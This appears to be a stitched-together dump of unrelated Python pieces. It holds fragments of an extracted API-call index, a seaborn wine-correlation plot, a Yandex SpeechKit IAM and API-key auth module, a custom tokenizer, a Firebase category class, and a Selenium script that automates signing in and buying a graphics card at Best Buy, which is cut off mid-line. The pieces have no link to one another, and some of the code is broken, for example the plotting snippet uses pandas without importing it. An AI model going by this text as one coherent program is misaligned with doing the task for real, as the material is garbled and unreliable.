((8208, 8347), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['alpha', 'monitoring', 'policies', 'create', '--policy-from-file',\n config_file.name]"], {'project_id': 'project_id'}), "(['alpha', 'monitoring', 'policies', 'create',\n '--policy-from-file', config_file.name], project_id=project_id)\n", (8233, 8347), False, 'from deploy.utils import runner\n'), ((9570, 9686), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['compute', 'instances', 'list', '--format', 'value(name,id)']"], {'project_id': 'project_id'}), "(['compute', 'instances', 'list', '--format',\n 'value(name,id)'], project_id=project_id)\n", (9595, 9686), False, 'from deploy.utils import runner\n'), ((878, 902), 'os.path.expanduser', 'os.path.expanduser', (['path'], {}), '(path)\n', (896, 902), False, 'import os\n'), ((937, 956), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (950, 956), False, 'import os\n'), ((1224, 1235), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1233, 1235), False, 'import os\n'), ((1262, 1285), 'os.path.join', 'os.path.join', (['cwd', 'path'], {}), '(cwd, path)\n', (1274, 1285), False, 'import os\n'), ((12262, 12289), 'glob.glob', 'glob.glob', (['absolute_pattern'], {}), '(absolute_pattern)\n', (12271, 12289), False, 'import glob\n'), ((13062, 13099), 'subprocess.check_call', 'subprocess.check_call', (['parameter_list'], {}), '(parameter_list)\n', (13083, 13099), False, 'import subprocess\n'), ((5909, 6088), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['alpha', 'monitoring', 'channels', 'create', '--channel-content-from-file',\n config_file.name, '--format', 'value(name)']"], {'project_id': 'project_id'}), "(['alpha', 'monitoring', 'channels', 'create',\n '--channel-content-from-file', config_file.name, '--format',\n 'value(name)'], project_id=project_id)\n", (5934, 6088), False, 'from deploy.utils import runner\n'), ((8455, 8567), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['config', 'list', 'account', '--format', 'value(core.account)']"], {'project_id': 'None'}), "(['config', 'list', 'account', '--format',\n 'value(core.account)'], project_id=None)\n", (8480, 8567), False, 'from deploy.utils import runner\n'), ((8686, 8806), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['projects', 'describe', project_id, '--format', 'value(projectNumber)']"], {'project_id': 'None'}), "(['projects', 'describe', project_id, '--format',\n 'value(projectNumber)'], project_id=None)\n", (8711, 8806), False, 'from deploy.utils import runner\n'), ((9199, 9326), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['logging', 'sinks', 'describe', log_sink_name, '--format',\n 'value(writerIdentity)']", 'project_id'], {}), "(['logging', 'sinks', 'describe', log_sink_name,\n '--format', 'value(writerIdentity)'], project_id)\n", (9224, 9326), False, 'from deploy.utils import runner\n'), ((12205, 12234), 'os.path.dirname', 'os.path.dirname', (['overall_path'], {}), '(overall_path)\n', (12220, 12234), False, 'import os\n'), ((10355, 10373), 'string.Template', 'string.Template', (['v'], {}), '(v)\n', (10370, 10373), False, 'import string\n'), ((11573, 11602), 'os.path.dirname', 'os.path.dirname', (['overall_path'], {}), '(overall_path)\n', (11588, 11602), False, 'import os\n')] |
import seaborn as sns
import matplotlib.pyplot as plt
wine = pd.read_csv('https://raw.githubusercontent.com/hadley/rminds/master/1-data/wine.csv').drop('type', axis = 1)
# Create correlation matrix
sns.heatmap(wine.corr(), cmap='viridis'); plt.show()
plt.matshow(wine.corr(), cmap = 'viridis')
plt.colorbar()
plt.show() | [
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.show"
] | [((243, 253), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (251, 253), True, 'import matplotlib.pyplot as plt\n'), ((298, 312), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (310, 312), True, 'import matplotlib.pyplot as plt\n'), ((313, 323), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (321, 323), True, 'import matplotlib.pyplot as plt\n')] |
import functools
import time
import jwt
import requests
from speechkit.exceptions import RequestError
def generate_jwt(service_account_id, key_id, private_key, exp_time=360):
"""
Generating JWT token for authorisation
:param string service_account_id: The ID of the service account whose key the JWT is signed with.
:param string key_id: The ID of the Key resource belonging to the service account.
:param bytes private_key: Private key given from Yandex Cloud console in bytes
:param integer exp_time: Optional. The token expiration time delta in seconds. The expiration
time must not exceed the issue time by more than one hour, meaning exp_time ≤ 3600. Default 360
:return: JWT token
:rtype: string
"""
if not isinstance(service_account_id, str) or not isinstance(key_id, str):
raise ValueError("service_account_id, key_id, must be strings.")
if 0 in (len(service_account_id), len(key_id)):
raise ValueError("service_account_id, key_id, can't be empty.")
if not isinstance(private_key, bytes):
raise ValueError("private_key must be bytes string, but got {}".format(type(private_key)))
if not isinstance(exp_time, int):
raise ValueError("exp_time must be int, but got {}".format(type(exp_time)))
if exp_time > 3600:
raise ValueError("exp_time ≤ 3600, but got {}".format(exp_time))
now = int(time.time())
payload = {
'aud': 'https://iam.api.cloud.yandex.net/iam/v1/tokens',
'iss': service_account_id,
'iat': now,
'exp': now + exp_time
}
return jwt.encode(
payload,
private_key,
algorithm='PS256',
headers={'kid': key_id}
)
def get_iam_token(yandex_passport_oauth_token=None, jwt_token=None):
"""
Creates an IAM token for the specified identity.
`Getting IAM for Yandex account <https://cloud.yandex.com/en/docs/iam/operations/iam-token/create>`_
:param string yandex_passport_oauth_token: OAuth token from Yandex OAuth
:param string jwt_token: Json Web Token, can be generated by :py:meth:`speechkit.generate_jwt`
:return: IAM token
:rtype: string
"""
if not type(yandex_passport_oauth_token) in (str, type(None)):
raise TypeError("__init__() yandex_passport_oauth_token: got {} but expected \
type is str or None".format(type(yandex_passport_oauth_token).__name__))
if not type(jwt_token) in (str, type(None)):
raise TypeError("__init__() jwt_token: got {} but expected \
type is str or None".format(type(jwt_token).__name__))
if (not yandex_passport_oauth_token and not jwt_token) or (yandex_passport_oauth_token and jwt_token):
raise ValueError("Includes only one of the fields `yandex_passport_oauth_token`, `jwt_token`")
if yandex_passport_oauth_token:
data = {'yandexPassportOauthToken': str(yandex_passport_oauth_token)}
else:
data = {'jwt': str(jwt_token)}
url = "https://iam.api.cloud.yandex.net/iam/v1/tokens"
answer = requests.post(url, json=data)
if answer.ok:
return answer.json().get('iamToken')
else:
raise RequestError(answer.json())
def get_api_key(yandex_passport_oauth_token=None, service_account_id=None,
description='Default Api-Key created by `speechkit` python SDK'):
"""
Creates an API key for the specified service account.
:param string yandex_passport_oauth_token: OAuth token from Yandex OAuth
:param string service_account_id: The ID of the service account whose key the Api-Key is signed with.
:param string description: Description for api-key. Optional.
:return: Api-Key
:rtype: string
"""
if not yandex_passport_oauth_token or not service_account_id:
raise ValueError("`yandex_passport_oauth_token` and `service_account_id` required.")
url = 'https://iam.api.cloud.yandex.net/iam/v1/apiKeys'
headers = {
'Authorization': 'Bearer {}'.format(get_iam_token(yandex_passport_oauth_token=yandex_passport_oauth_token))
}
data = {'serviceAccountId': service_account_id, 'description': description}
answer = requests.post(url, headers=headers, json=data)
if answer.ok:
return answer.json().get('secret')
else:
raise RequestError(answer.json())
class Session:
"""Class provides yandex API authentication."""
IAM_TOKEN = 'iam_token'
"""Iam_token if iam auth, value: 'iam_token'"""
API_KEY = 'api_key'
"""Api key if api-key auth, value: 'api_key'"""
def __init__(self, auth_type, credential, folder_id):
"""
Stores credentials for given auth method
:param string auth_type: Type of auth may be :py:meth:`Session.IAM_TOKEN` or :py:meth:`Session.API_KEY`
:param string | None folder_id: Id of the folder that you have access to. Don't specify this field if
you make a request on behalf of a service account.
:param string credential: Auth key iam or api key
"""
if auth_type not in (self.IAM_TOKEN, self.API_KEY):
raise ValueError(
"auth_type must be `Session.IAM_TOKEN` or `Session.API_KEY`, but given {}".format(auth_type)
)
self._auth_method = auth_type
if not isinstance(credential, str):
raise ValueError("_credential must be string, but got {}".format(type(credential)))
self._credential = credential
self.folder_id = folder_id
@classmethod
def from_api_key(cls, api_key, folder_id=None):
"""
Creates session from api key
:param string api_key: Yandex Cloud Api-Key
:param string | None folder_id: Id of the folder that you have access to. Don't specify this field if
you make a request on behalf of a service account.
:return: Session instance
:rtype: Session
"""
if not isinstance(api_key, str):
raise ValueError("Api-Key must be string, but got {}".format(type(api_key)))
if len(api_key) == 0:
raise ValueError("Api-Key can not be empty.")
if folder_id:
if not isinstance(folder_id, str):
raise ValueError("folder_id must be string, but got {}".format(type(folder_id)))
if len(folder_id) == 0:
raise ValueError("folder_id must not be empty.")
return cls(cls.API_KEY, api_key, folder_id=folder_id)
@classmethod
def from_yandex_passport_oauth_token(cls, yandex_passport_oauth_token, folder_id):
"""
Creates Session from oauth token Yandex account
:param string yandex_passport_oauth_token: OAuth token from Yandex.OAuth
:param string folder_id: Id of the folder that you have access to. Don't specify this field if
you make a request on behalf of a service account.
:return: Session instance
:rtype: Session
"""
if not isinstance(yandex_passport_oauth_token, str):
raise ValueError(
"yandex_passport_oauth_token must be string, but got {}".format(type(yandex_passport_oauth_token))
)
if len(yandex_passport_oauth_token) == 0:
raise ValueError("yandex_passport_oauth_token can not be empty.")
if not isinstance(folder_id, str):
raise ValueError("folder_id must be string, but got {}".format(type(folder_id)))
if len(folder_id) == 0:
raise ValueError("folder_id must not be empty.")
iam_token = get_iam_token(yandex_passport_oauth_token=yandex_passport_oauth_token)
return cls(cls.IAM_TOKEN, iam_token, folder_id=folder_id)
@classmethod
def from_jwt(cls, jwt_token, folder_id=None):
"""
Creates Session from JWT token
:param string jwt_token: JWT
:param string | None folder_id: Id of the folder that you have access to. Don't specify this field if
you make a request on behalf of a service account.
:return: Session instance
:rtype: Session
"""
if not isinstance(jwt_token, str):
raise ValueError("jwt_token must be string, but got {}".format(type(jwt_token)))
if len(jwt_token) == 0:
raise ValueError("jwt_token can not be empty.")
if folder_id:
if not isinstance(folder_id, str):
raise ValueError("folder_id must be string, but got {}".format(type(folder_id)))
if len(folder_id) == 0:
raise ValueError("folder_id must not be empty.")
iam_token = get_iam_token(jwt_token=jwt_token)
return cls(cls.IAM_TOKEN, iam_token, folder_id=folder_id)
@functools.cached_property
def header(self):
"""
Authentication header.
:return: Dict in format `{'Authorization': 'Bearer or Api-Key {iam or api_key}'}`
:rtype: dict
"""
if self._auth_method == self.IAM_TOKEN:
return {'Authorization': 'Bearer {iam}'.format(iam=self._credential)}
if self._auth_method == self.API_KEY:
return {'Authorization': 'Api-Key {api_key}'.format(api_key=self._credential)}
@functools.cached_property
def streaming_recognition_header(self):
"""
Authentication header for streaming recognition
:return: Tuple in format `('authorization', 'Bearer or Api-Key {iam or api_key}')`
:rtype: tuple
"""
if self._auth_method == self.IAM_TOKEN:
return tuple(('authorization', 'Bearer {iam}'.format(iam=self._credential),))
if self._auth_method == self.API_KEY:
return tuple(('authorization', 'Api-Key {api_key}'.format(api_key=self._credential),))
@functools.cached_property
def auth_method(self):
return self._auth_method
| [
"requests.post",
"time.time",
"jwt.encode"
] | [((1603, 1679), 'jwt.encode', 'jwt.encode', (['payload', 'private_key'], {'algorithm': '"""PS256"""', 'headers': "{'kid': key_id}"}), "(payload, private_key, algorithm='PS256', headers={'kid': key_id})\n", (1613, 1679), False, 'import jwt\n'), ((3079, 3108), 'requests.post', 'requests.post', (['url'], {'json': 'data'}), '(url, json=data)\n', (3092, 3108), False, 'import requests\n'), ((4200, 4246), 'requests.post', 'requests.post', (['url'], {'headers': 'headers', 'json': 'data'}), '(url, headers=headers, json=data)\n', (4213, 4246), False, 'import requests\n'), ((1407, 1418), 'time.time', 'time.time', ([], {}), '()\n', (1416, 1418), False, 'import time\n')] |
import io
import re
import sys
import token
import tokenize
from token import tok_name
from tokenize import TokenInfo
from typing import Iterator, List
numchars = "0123456789"
reNamelike = re.compile(r"[A-Za-z_]")
reWhitespace = re.compile("[ \t\n]+")
reName = re.compile(r"[A-Za-z_]\w*")
reStringStart = re.compile(r'"""|"|\'\'\'|\'')
def read_number(data):
if "3" in data:
print(data)
# Cheat for now
# -1 because will always be a newline, but sometimes that newline
# is an escaped newline
s = io.StringIO(data[:-1])
toke = next(tokenize.generate_tokens(s.readline))
if toke.type == token.NUMBER:
return toke.string
return False
def character_generator(file_interface, encoding="utf-8", verbose=False):
raw_data = file_interface.read()
try:
data = raw_data.decode(encoding)
except AttributeError:
data = raw_data
pos, maxlen = 0, len(data)
line_start, line_end = 0, 0
line_no = 0
while pos < maxlen:
# if pos > 3050:
# return
_previous_pos = pos
if line_end <= pos:
line_no += 1
# work out the line end for line-slicing
line_start = line_end
line_end = data.find("\n", pos) + 1
if line_end == 0:
line_end = maxlen
line = data[line_start:line_end]
line_remaining = data[pos:line_end]
# print(line)
if verbose:
print(
"Processing line: \033[37m"
+ repr(
data[line_start:pos] + "_e_[30;1m|_e_[0m" + data[pos:line_end]
).replace("_e_", "\033")
)
if data[pos] == "\\" and not (pos + 1) == maxlen and data[pos + 1] == "\n":
# Handle swallowing escaped newlines
if verbose:
print("Escaped newline")
pos += 2
line_no += 1
elif match := reWhitespace.match(data, pos=pos):
newlines = match.group().count("\n")
if "\n" in match.group():
yield TokenInfo(
type=token.NEWLINE,
string="\n",
start=(line_no, pos),
end=(line_no + newlines, match.end()),
line=line,
)
else:
yield TokenInfo(
type=token.OP,
string=" ",
start=(line_no, pos),
end=(line_no, match.end()),
line=line,
)
pos = match.end()
line_no += newlines
# elif data[pos] == "\t":
# if verbose:
# print(f"{pos}: Tab (sent space)")
# yield TokenInfo(
# type=token.OP,
# string=" ",
# start=(line_no, pos),
# end=(line_no, pos),
# line=line,
# )
# pos += 1
elif data[pos] == "\n":
if verbose:
print(f"{pos}: NEWLINE")
pos += 1
yield TokenInfo(
type=token.NEWLINE,
string="\n",
start=(line_no, pos - 1),
end=(line_no, pos),
line=line,
)
elif (string := reStringStart.match(data, pos=pos)) and (
pos == 0 or data[pos - 1] in " \n\t{}="
):
quote_type = string.group()
end_pattern = r"(?<!\\)" + quote_type
re_endquote = re.compile(end_pattern, re.M | re.S)
end_match = re_endquote.search(data, pos=pos + len(quote_type))
assert end_match, "Unterminated string"
contents = data[
string.start() + len(quote_type) : end_match.end() - len(quote_type)
]
start_l = line_no
line_no += contents.count("\n")
# Found the start of some string
# data.find(quote_type, pos=pos+len(string))
if verbose:
print(f"STRING: {contents!r}")
full_str = quote_type + contents + quote_type
yield TokenInfo(
type=token.STRING,
string=full_str,
start=(start_l, pos),
end=(line_no + 1, pos + len(full_str)),
line="",
)
pos = end_match.end()
elif name := reName.match(data, pos=pos):
if verbose:
print(f"{pos}: NAME {name.group()}")
yield TokenInfo(
type=token.NAME,
string=name.group(),
start=(line_no, name.start()),
end=(line_no, name.end()),
line=line,
)
pos += len(name.group())
elif data[pos] in "0123456789":
yield TokenInfo(
type=token.NUMBER,
string=data[pos],
start=(line_no, pos),
end=(line_no, pos),
line=line,
)
pos += 1
else:
if verbose:
print(f"OP: {data[pos]}")
yield TokenInfo(
type=token.OP,
string=data[pos],
start=(line_no, pos),
end=(line_no, pos + 1),
line=line,
)
# print("Something else?")
pos += 1
assert pos != _previous_pos, "Didn't advance position"
yield TokenInfo(
type=token.NEWLINE,
string="\n",
start=(line_no, pos),
end=(line_no, pos),
line="",
)
yield TokenInfo(
type=token.ENDMARKER,
string="",
start=(line_no, pos + 1),
end=(line_no, pos + 1),
line="",
)
return None
def simple_generator(file_interface, encoding="utf-8", verbose=True):
#
# needcont: Currently processing a continuing string
# contstr: The string currently being built
# endprog: The match condition for ending a continuing string
raw_data = file_interface.read()
try:
data = raw_data.decode(encoding)
except AttributeError:
data = raw_data
# last_line = b""
# line = b""
# line_no = 0
# while True:
# try:
# last_line = line
# line = file_interface()
# except StopIteration:
# line = b""
# if encoding is not None:
# line = line.decode(encoding)
# line_no += 1
# pos, max = 0, len(line)
pos, maxlen = 0, len(data)
line_start, line_end = 0, 0
line_no = 0
while pos < maxlen:
# if pos > 3050:
# return
_previous_pos = pos
if line_end <= pos:
line_no += 1
# work out the line end for line-slicing
line_start = line_end
line_end = data.find("\n", pos) + 1
if line_end == 0:
line_end = maxlen
line = data[line_start:line_end]
line_remaining = data[pos:line_end]
if verbose:
print(
"Processing line: \033[37m"
+ repr(
data[line_start:pos] + "_e_[30;1m|_e_[0m" + data[pos:line_end]
).replace("_e_", "\033")
)
if match := reWhitespace.match(line_remaining):
# Skip whitespace
pos += match.end()
elif data[pos] == "\\" and not (pos + 1) == maxlen and data[pos + 1] == "\n":
# Handle swallowing escaped newlines
if verbose:
print("Escaped newline")
pos += 2
elif data[pos] == "\n":
if verbose:
print(f"NEWLINE")
pos += 1
yield TokenInfo(
type=token.NEWLINE,
string="\n",
start=(line_no, pos - 1),
end=(line_no, pos),
line=line,
)
elif match := reName.match(line_remaining):
if verbose:
print(f"NAME: {match.group(0)}")
pos += match.end()
yield TokenInfo(
type=token.NAME,
string=match.group(0),
start=(line_no, match.start()),
end=(line_no, match.end()),
line=line,
)
elif data[pos] == "#":
pos = line_end
elif number := read_number(line_remaining):
if verbose:
print(f"NUMBER: {number}")
yield TokenInfo(
type=token.NUMBER,
string=number,
start=(line_no, pos),
end=(line_no, pos + len(number)),
line=line,
)
pos += len(number)
elif string := reStringStart.match(data, pos=pos):
quote_type = string.group()
end_pattern = r"(?<!\\)" + quote_type
re_endquote = re.compile(end_pattern, re.M | re.S)
end_match = re_endquote.search(data, pos=pos + len(quote_type))
assert end_match, "Unterminated string"
contents = data[
string.start() + len(quote_type) : end_match.end() - len(quote_type)
]
# Found the start of some string
# data.find(quote_type, pos=pos+len(string))
if verbose:
print(f"STRING: {contents!r}")
pos = end_match.end()
else:
if verbose:
print(f"CHAR: {data[pos]}")
yield TokenInfo(
type=token.OP,
string=data[pos],
start=(line_no, pos),
end=(line_no, pos + 1),
line=line,
)
# print("Something else?")
pos += 1
assert pos != _previous_pos, "Didn't advance position"
return TokenInfo(type=token.ENDMARKER, string="", start=pos, end=pos, line="")
Mark = int # NewType('Mark', int)
exact_token_types = token.EXACT_TOKEN_TYPES # type: ignore
def shorttok(tok: tokenize.TokenInfo) -> str:
return (
"%-25.25s"
% f"{tok.start[0]}.{tok.start[1]}: {token.tok_name[tok.type]}:{tok.string!r}"
)
class Tokenizer:
"""Caching wrapper for the tokenize module.
This is pretty tied to Python's syntax.
"""
_tokens: List[tokenize.TokenInfo]
def __init__(
self, tokengen: Iterator[tokenize.TokenInfo], *, verbose: bool = False
):
self._tokengen = tokengen
self._tokens = []
self._index = 0
self._verbose = verbose
if verbose:
self.report(False, False)
def getnext(self) -> tokenize.TokenInfo:
"""Return the next token and updates the index."""
cached = True
while self._index == len(self._tokens):
tok = next(self._tokengen)
if tok.type in (tokenize.COMMENT, tokenize.INDENT, tokenize.DEDENT,):
continue
# Transform NL to NEWLINE
if tok.type == token.NL:
tok = tokenize.TokenInfo(
token.NEWLINE,
tok.string,
start=tok.start,
end=tok.end,
line=tok.line,
)
if tok.type == token.ERRORTOKEN and tok.string.isspace():
continue
self._tokens.append(tok)
cached = False
tok = self._tokens[self._index]
self._index += 1
if self._verbose:
self.report(cached, False)
return tok
def peek(self) -> tokenize.TokenInfo:
"""Return the next token *without* updating the index."""
while self._index == len(self._tokens):
tok = next(self._tokengen)
if tok.type in (tokenize.COMMENT, tokenize.INDENT, tokenize.DEDENT,):
continue
# Transform NL to NEWLINE
if tok.type == token.NL:
tok = tokenize.TokenInfo(
token.NEWLINE,
tok.string,
start=tok.start,
end=tok.end,
line=tok.line,
)
if tok.type == token.ERRORTOKEN and tok.string.isspace():
continue
self._tokens.append(tok)
return self._tokens[self._index]
def diagnose(self) -> tokenize.TokenInfo:
if not self._tokens:
self.getnext()
return self._tokens[-1]
def mark(self) -> Mark:
return self._index
def reset(self, index: Mark) -> None:
if index == self._index:
return
assert 0 <= index <= len(self._tokens), (index, len(self._tokens))
old_index = self._index
self._index = index
if self._verbose:
self.report(True, index < old_index)
def report(self, cached: bool, back: bool) -> None:
if back:
fill = "-" * self._index + "-"
elif cached:
fill = "-" * self._index + ">"
else:
fill = "-" * self._index + "*"
if self._index == 0:
print(f"{fill} (Bof)")
else:
tok = self._tokens[self._index - 1]
print(f"{fill} {shorttok(tok)}")
def main():
import argparse
# Helper error handling routines
def perror(message):
sys.stderr.write(message)
sys.stderr.write("\n")
def error(message, filename=None, location=None):
if location:
args = (filename,) + location + (message,)
perror("%s:%d:%d: error: %s" % args)
elif filename:
perror("%s: error: %s" % (filename, message))
else:
perror("error: %s" % message)
sys.exit(1)
# Parse the arguments and options
parser = argparse.ArgumentParser(prog="python -m tokenize")
parser.add_argument(
dest="filename",
nargs="?",
metavar="filename.py",
help="the file to tokenize; defaults to stdin",
)
parser.add_argument(
"-e",
"--exact",
dest="exact",
action="store_true",
help="display token names using the exact type",
)
args = parser.parse_args()
try:
# Tokenize the input
if args.filename:
filename = args.filename
with open(filename, "r") as f:
tokens = list(character_generator(f))
else:
filename = "<stdin>"
tokens = character_generator(sys.stdin, None)
# Output the tokenization
for token in tokens:
token_type = token.type
if args.exact:
token_type = token.exact_type
token_range = "%d,%d-%d,%d:" % (token.start + token.end)
print("%-20s%-15s%-15r" % (token_range, tok_name[token_type], token.string))
except SyntaxError as err:
error(err, filename)
except OSError as err:
error(err)
except KeyboardInterrupt:
print("interrupted\n")
except Exception as err:
perror("unexpected error: %s" % err)
raise
if __name__ == "__main__":
main()
| [
"argparse.ArgumentParser",
"re.compile",
"tokenize.TokenInfo",
"tokenize.generate_tokens",
"sys.stderr.write",
"sys.exit",
"io.StringIO"
] | [((191, 214), 're.compile', 're.compile', (['"""[A-Za-z_]"""'], {}), "('[A-Za-z_]')\n", (201, 214), False, 'import re\n'), ((231, 253), 're.compile', 're.compile', (['"""[ \t\n]+"""'], {}), "('[ \\t\\n]+')\n", (241, 253), False, 'import re\n'), ((263, 290), 're.compile', 're.compile', (['"""[A-Za-z_]\\\\w*"""'], {}), "('[A-Za-z_]\\\\w*')\n", (273, 290), False, 'import re\n'), ((307, 344), 're.compile', 're.compile', (['"""""\\"|"|\\\\\'\\\\\'\\\\\'|\\\\\'"""'], {}), '(\'"""|"|\\\\\\\'\\\\\\\'\\\\\\\'|\\\\\\\'\')\n', (317, 344), False, 'import re\n'), ((529, 551), 'io.StringIO', 'io.StringIO', (['data[:-1]'], {}), '(data[:-1])\n', (540, 551), False, 'import io\n'), ((9937, 10008), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.ENDMARKER', 'string': '""""""', 'start': 'pos', 'end': 'pos', 'line': '""""""'}), "(type=token.ENDMARKER, string='', start=pos, end=pos, line='')\n", (9946, 10008), False, 'from tokenize import TokenInfo\n'), ((13892, 13942), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""python -m tokenize"""'}), "(prog='python -m tokenize')\n", (13915, 13942), False, 'import argparse\n'), ((568, 604), 'tokenize.generate_tokens', 'tokenize.generate_tokens', (['s.readline'], {}), '(s.readline)\n', (592, 604), False, 'import tokenize\n'), ((5530, 5628), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NEWLINE', 'string': '"""\n"""', 'start': '(line_no, pos)', 'end': '(line_no, pos)', 'line': '""""""'}), "(type=token.NEWLINE, string='\\n', start=(line_no, pos), end=(\n line_no, pos), line='')\n", (5539, 5628), False, 'from tokenize import TokenInfo\n'), ((5681, 5787), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.ENDMARKER', 'string': '""""""', 'start': '(line_no, pos + 1)', 'end': '(line_no, pos + 1)', 'line': '""""""'}), "(type=token.ENDMARKER, string='', start=(line_no, pos + 1), end=(\n line_no, pos + 1), line='')\n", (5690, 5787), False, 'from tokenize import TokenInfo\n'), ((13446, 13471), 'sys.stderr.write', 'sys.stderr.write', (['message'], {}), '(message)\n', (13462, 13471), False, 'import sys\n'), ((13480, 13502), 'sys.stderr.write', 'sys.stderr.write', (['"""\n"""'], {}), "('\\n')\n", (13496, 13502), False, 'import sys\n'), ((13828, 13839), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (13836, 13839), False, 'import sys\n'), ((11135, 11229), 'tokenize.TokenInfo', 'tokenize.TokenInfo', (['token.NEWLINE', 'tok.string'], {'start': 'tok.start', 'end': 'tok.end', 'line': 'tok.line'}), '(token.NEWLINE, tok.string, start=tok.start, end=tok.end,\n line=tok.line)\n', (11153, 11229), False, 'import tokenize\n'), ((12053, 12147), 'tokenize.TokenInfo', 'tokenize.TokenInfo', (['token.NEWLINE', 'tok.string'], {'start': 'tok.start', 'end': 'tok.end', 'line': 'tok.line'}), '(token.NEWLINE, tok.string, start=tok.start, end=tok.end,\n line=tok.line)\n', (12071, 12147), False, 'import tokenize\n'), ((3132, 3236), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NEWLINE', 'string': '"""\n"""', 'start': '(line_no, pos - 1)', 'end': '(line_no, pos)', 'line': 'line'}), "(type=token.NEWLINE, string='\\n', start=(line_no, pos - 1), end=(\n line_no, pos), line=line)\n", (3141, 3236), False, 'from tokenize import TokenInfo\n'), ((3572, 3608), 're.compile', 're.compile', (['end_pattern', '(re.M | re.S)'], {}), '(end_pattern, re.M | re.S)\n', (3582, 3608), False, 'import re\n'), ((7814, 7918), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NEWLINE', 'string': '"""\n"""', 'start': '(line_no, pos - 1)', 'end': '(line_no, pos)', 'line': 'line'}), "(type=token.NEWLINE, string='\\n', start=(line_no, pos - 1), end=(\n line_no, pos), line=line)\n", (7823, 7918), False, 'from tokenize import TokenInfo\n'), ((4886, 4990), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.NUMBER', 'string': 'data[pos]', 'start': '(line_no, pos)', 'end': '(line_no, pos)', 'line': 'line'}), '(type=token.NUMBER, string=data[pos], start=(line_no, pos), end=(\n line_no, pos), line=line)\n', (4895, 4990), False, 'from tokenize import TokenInfo\n'), ((5200, 5304), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.OP', 'string': 'data[pos]', 'start': '(line_no, pos)', 'end': '(line_no, pos + 1)', 'line': 'line'}), '(type=token.OP, string=data[pos], start=(line_no, pos), end=(\n line_no, pos + 1), line=line)\n', (5209, 5304), False, 'from tokenize import TokenInfo\n'), ((9006, 9042), 're.compile', 're.compile', (['end_pattern', '(re.M | re.S)'], {}), '(end_pattern, re.M | re.S)\n', (9016, 9042), False, 'import re\n'), ((9606, 9710), 'tokenize.TokenInfo', 'TokenInfo', ([], {'type': 'token.OP', 'string': 'data[pos]', 'start': '(line_no, pos)', 'end': '(line_no, pos + 1)', 'line': 'line'}), '(type=token.OP, string=data[pos], start=(line_no, pos), end=(\n line_no, pos + 1), line=line)\n', (9615, 9710), False, 'from tokenize import TokenInfo\n')] |
from firebase import firebase
from firebase_admin import db
from prettytable import PrettyTable
class Category:
def __init__(self, category_name=None):
self.category_name = category_name
def add_category(self, category_name=None):
data = {
'category_name': category_name,
}
new_ref = db.reference('Category').push(data)
return new_ref.key
@staticmethod
def remove_category(id):
db.reference("Category/{}".format(id)).delete()
@staticmethod
def get_all_categories():
categories = db.reference("Category").get()
print("All Categories:")
count = 1
t = PrettyTable(["S.no", "Category"])
if categories:
for category_id, values in categories.items():
t.add_row([count, values['category_name']])
count += 1
print(t)
return True
else:
t.add_row([0, "No Category !!"])
print(t)
return False
@staticmethod
def get_category_by_id(id):
category = db.reference("Category/{}".format(id)).get()
return category
| [
"prettytable.PrettyTable",
"firebase_admin.db.reference"
] | [((675, 708), 'prettytable.PrettyTable', 'PrettyTable', (["['S.no', 'Category']"], {}), "(['S.no', 'Category'])\n", (686, 708), False, 'from prettytable import PrettyTable\n'), ((342, 366), 'firebase_admin.db.reference', 'db.reference', (['"""Category"""'], {}), "('Category')\n", (354, 366), False, 'from firebase_admin import db\n'), ((579, 603), 'firebase_admin.db.reference', 'db.reference', (['"""Category"""'], {}), "('Category')\n", (591, 603), False, 'from firebase_admin import db\n')] |
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.support import expected_conditions as ec
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium import webdriver
from time import sleep
import account
def start():
options = Options()
options.headless = False
fp = FirefoxProfile()
fp.set_preference('geo.enabled', False)
driver = webdriver.Firefox(firefox_profile=fp, options=options)
wait = WebDriverWait(driver, 20)
def word_entry(element, word):
for char in word:
element.send_keys(char)
# checks if survey pops up
def survey():
print("Survey")
checking_survey = True
while checking_survey:
try:
driver.find_element_by_id('survey_invite_no').click()
checking_survey = False
print(" Declined")
sleep(1)
except NoSuchElementException:
print(" No Survey")
checking_survey = False
# checks if spinner is invisible to continue to check out
def spinner_check():
try:
WebDriverWait(driver, 4).until(ec.invisibility_of_element_located
((By.CLASS_NAME, "page-spinner")))
print("Gone")
except:
print("Spinner Not There")
pass
print('Loading...')
# Item of choice
driver.get('https://www.bestbuy.com/site/evga-nvidia-geforce-rtx-3060'
'-xc-gaming-12gb-gddr6-pci-express-4-0-graphics-card/6454329.p?skuId=6454329')
# driver.get('https://www.bestbuy.com/site/nvidia-geforce-rtx-3080'
# '-10gb-gddr6x-pci-express-4-0-graphics-card-titanium-and'
# '-black/6429440.p?skuId=6429440')
sleep(5)
survey()
# Account button drop down
wait.until(ec.element_to_be_clickable((By.CSS_SELECTOR, '.account-button')))
driver.find_element_by_css_selector('.account-button').click()
print("***Found Account Button***")
# Sign in button from drop down
wait.until(ec.presence_of_element_located((By.CSS_SELECTOR, '.sign-in-btn')))
driver.find_element_by_css_selector('.sign-in-btn').click()
print("***Found Sign-In Button***")
#
